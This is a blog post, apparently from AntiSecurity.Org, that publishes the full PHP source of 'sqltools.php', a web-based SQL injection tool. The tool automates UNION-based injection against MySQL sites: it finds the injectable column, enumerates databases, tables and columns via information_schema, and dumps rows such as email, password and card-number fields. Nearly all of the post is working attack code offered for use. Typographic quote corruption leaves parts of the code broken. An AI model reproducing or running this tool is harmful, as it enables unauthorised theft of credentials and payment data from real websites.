|    |    |    | Today: 23-Sep-2017 |

Sourcode sqltools.php from AntiSecurity.Org

November 3, 2009 | Posted in How to

MALINGSIAL NOT ALLOWED

<?
set_time_limit(0);
error_reporting(0);
$fungsi=$_POST['fungsi'];
$url=$_POST['url'];
$db=$_POST['db'];
$table=$_POST['table'];
$column=$_POST['column'];
$start=$_POST['start'];
$stop=$_POST['stop'];
$target=$_POST['target'];

?>
<title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
<head><script>
function show(id){
document.getElementById(id).style.display=”block”;
}
function hide(id){
document.getElementById(id).style.display=”none”;
}
function db(){show(”db”);hide(”table”);hide(”column”);hide(”dump”);hide(”findcol”);}
function table(){hide(”db”);show(”table”);hide(”column”);hide(”dump”);hide(”findcol”);}
function column(){hide(”db”);hide(”table”);show(”column”);hide(”dump”);hide(”findcol”);}
function dump(){hide(”db”);hide(”table”);hide(”column”);show(”dump”);hide(”findcol”);}
function findcol(){hide(”db”);hide(”table”);hide(”column”);hide(”dump”);show(”findcol”);}
function help(){alert(”This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info”);}
</script><style>
#db,#table,#column,#dump,#findcol {display:none;}
</style></head>
<a href=”javascript:findcol();”>FindCol</a> |
<a href=”javascript:db();”>Database</a> |
<a href=”javascript:table();”>Table</a> |
<a href=”javascript:column();”>Column</a> |
<a href=”javascript:dump();”>Dump</a> |
<a href=”javascript:help();”>Help</a> |
<b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a
href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
<p>
<div id=db>
<form method=post>
<input type=hidden name=fungsi value=db>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td><td><td><input type=submit value=”Show Databases”></table>
</form>
</div>
<div id=table>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=table>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”><br>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”><br>
<tr><td><td><td><input type=submit value=”Show Table”></table>
</form>
</div>
<div id=column>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=column>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”>
<tr><td>Table<td> : <td><input name=table value=”<?=$table;?>”>
<tr><td><td><td><input type=submit value=”Show Column”></table>
</form>
</div>
<div id=dump>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=dump>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”>
<tr><td>Table<td> : <td><input name=table value=”<?=$table;?>”>
<tr><td>Column<td> : <td><input name=column value=”<?=$column;?>”> ex : email,passwd,card_num
<tr><td>Start<td> : <td><input name=start value=”<?=$start;?>”> **start from field number**
<tr><td>Stop<td> : <td><input name=stop value=”<?=$stop;?>”> **stop field number**
<tr><td><td><td><input type=submit value=”Dump”></table>
</form>
</div>
<div id=findcol>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<font color=”#000000?>Target</font> <input name=target size=100 value=”<?=$target;?>”><input type=submit value=test>
</form>
</div>
<?
/* GET DATABASE NAME */
if(isset($url) && $fungsi==”db”){
$countdb=”concat(0×6b30706c30,count(schema_name),0×6b30706c30)”;
$showdb=”concat(0×6b30706c30,schema_name,0×6b30706c30)”;
$showdb2=”+from+information_schema.schemata”;
$end=”–”;
//print “$url <br>”;
$url_1=str_replace(”k0pl0?,$countdb,$url);
$url_2=$url_1.$showdb2.$end;
$url_3=str_replace(”k0pl0?,$showdb,$url);
$data=file_get_contents($url_2);
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “$jumlah database<br>”;
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$showdb2.”+limit+$i,1?.$end;
$datax=file_get_contents($urlx);
$namadatabase=antara($datax,”k0pl0?,”k0pl0?);
echo “$nomor : $namadatabase <br>”;
flush();
}
}

/* GET TABLE NAME */
if(isset($url) && $fungsi == “table”){
$query=”concat(0×6b30706c30,count(table_name),0×6b30706c30)”;
$next=”+from+information_schema.tables”;
$query2=”concat(0×6b30706c30,table_name,0×6b30706c30)”;
$end=”–”;
if(isset($db) && $db !==”"){
$next=$next.”+where+table_schema=0x”.bin2hex($db);
}

$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah tables<br>”;
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next.”+limit+$i,1?.$end;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
echo “$nomor : $namatable <br>”;
flush();
}
}
// GET COLUMN NAME LIST
if(isset($url) && $url3 !== “” && isset($table) && $table !== “” && $fungsi == “column”){
$query=”concat(0×6b30706c30,count(column_name),0×6b30706c30)”;
$next=”+from+information_schema.columns+where+table_name=0x”.bin2hex($table);
$query2=”concat(0×6b30706c30,column_name,0×6b30706c30)”;
$end=”–”;
if(isset($db) && $db !==”"){
$next=$next.”+and+table_schema=0x”.bin2hex($db);
}
$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah Columns<br>”;
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next.”+limit+$i,1?.$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
echo “$nomor : $namatable <br>”;
flush();
}
}

// DUMB DATA
if($fungsi==”dump” && isset($url) && $url !== “” && isset($table) && $table !== “” && isset($column) && $column !==”" ){
$query=”concat(0×6b30706c30,count(*),0×6b30706c30)”;
$next=”+from+$table”;
$query2=”concat(0×6b30706c30,concat_ws(0×203a20,”.$column.”),0×6b30706c30)”;
$end=”–”;
if(isset($db) && $db !==”"){
$next=”+from+$db.$table”;
}
$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah data<br>”;
for($i=$start;$i<=$stop;$i++){
flush();
$nomor=$i;
$urlx=$url_3.$next.”+limit+$i,1?.$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
echo “$nomor : $namatable <br>”;
flush();
}
}
// GET MAGIC NUMBER
if(isset($target) && $taget !== “”){
echo “trying… 1 “;
$targetx=$target.”-1+union+select+0×6b30706c30?;
$targety=$target.”-1+union+select+1?;
$injek=”";
$y=”";
$end=”–”;
for($i=1;$i<100;$i++){
flush();
$y .= “,”.($i+1);
$oon=($i+1).”oon”;
$hexx=bin2hex($oon);
$injek.=”,0×6b30706c30?.$hexx;
$link=$targetx.$injek;
$akhir = $link.$end;
//echo $akhir;
echo ($i+1).” “;
$data=file_get_contents($akhir);
if(eregi(”k0pl0?,$data)){
$magicnumber=antara($data,”k0pl0?,”oon”);
$mbuh=”,”.$magicnumber.”,”;
$zzz=str_replace($mbuh,”,k0pl0,”,$targety.$y);
$linkinjek=$targety.$y.$end;
echo “<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\”_blank\”>$linkinjek</a><p><b>info</b><br>”;
$ambilinfo=str_replace(”k0pl0?,”concat(0×6b30706c30,concat_ws
(0×3c62723e,concat(0×64617461626173652076657273696f6e203a20,version()),concat
(0×64617461626173652075736572203a20,user()),concat(0×6461746162617365206e616d65203a20,database())),0×6b30706c30)”,$zzz).$end;
$datainfo=file_get_contents($ambilinfo);
$info=antara($datainfo,”k0pl0?,”k0pl0?);
echo $info;
break;
}
if($i==”99?){echo “<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :) <b></font>”;}
flush();
}
}

function antara($string, $start, $end){
$string = ” “.$string;
$ini = strpos($string,$start);
if ($ini == 0) return “”;
$ini += strlen($start);
$len = strpos($string,$end,$ini) – $ini;
return substr($string,$ini,$len);
}
?>

Taged in: antisecurity, sourcode, sqltools